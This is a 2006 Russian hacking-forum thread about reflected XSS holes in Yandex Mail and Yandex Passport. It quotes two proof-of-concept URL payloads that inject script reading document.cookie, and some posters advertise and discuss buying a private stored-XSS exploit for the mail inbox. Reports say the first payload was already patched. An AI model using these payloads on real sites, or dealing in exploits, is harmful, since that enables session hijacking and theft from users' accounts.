Форум АНТИЧАТ - mail.yandex.ru passive xss

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - mail.yandex.ru passive xss (https://forum.antichat.xyz/showthread.php?t=26571)

vectorg

05.11.2006 05:36

mail.yandex.ru passive xss

Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good :)

Цитата:

-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.co okie)</script>

+ один товарищ тут продает нечто подобное.

З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru?

vectorg

05.11.2006 12:56

Это уже на ваше усмотрение - хотите, переносите...
Выложил сюда, только из-за того, что это продается.
;)

Mobile

05.11.2006 14:10

Надо было в паблик выложить, испортить тому барыге бизнес:)

Elekt

08.11.2006 11:18

=) хехе

=Be$=

08.11.2006 13:14

Как я помню он ее за 25уе продовал)))

Pionep

11.11.2006 21:46

Цитата:

Сообщение от VectorG

один товарищ тут продает нечто подобное.

Продаваемая мною бага НЕ ИЗВЕСТНА НИКОМУ!
С выше написанной уязвимостью не имеет никакой связи.
Работает в другом направлении.

+ к этому скрипт, приготовленный для жертвы, будет выполняться каждый раз при заходе на страницу входящих сообщений. :)

С учётом того, что наконец пройдена проверка Гарантом, ПОКУПАЕМ!

Pionep

11.11.2006 23:07

Как работает выше написанная бага?
В двух проверенных браузерах, "><script>alert(document.cookie)</script> аккуратно распечатывается в форме :(

Ksander

11.11.2006 23:18

Наверно уже прикрыли, не пашет ни на ie, ни в myie.

_Great_

23.12.2006 23:44

IE:

Код:

http://passport.yandex.ru/passport?mode=register&ncrnd=&step=one&confirmed=yes&idkey=&filled=yes&login=qwerty%22%20style='background:url(javascript:alert(document.cookie))'

правда глюки есть некоторые%)

MyNick

28.12.2006 02:39

Ребята, короче вот http://ifolder.ru/735692 и вот http://ifolder.ru/735710 потом скажите мне пожалуста что вы об этом думаете !??

Время: 11:08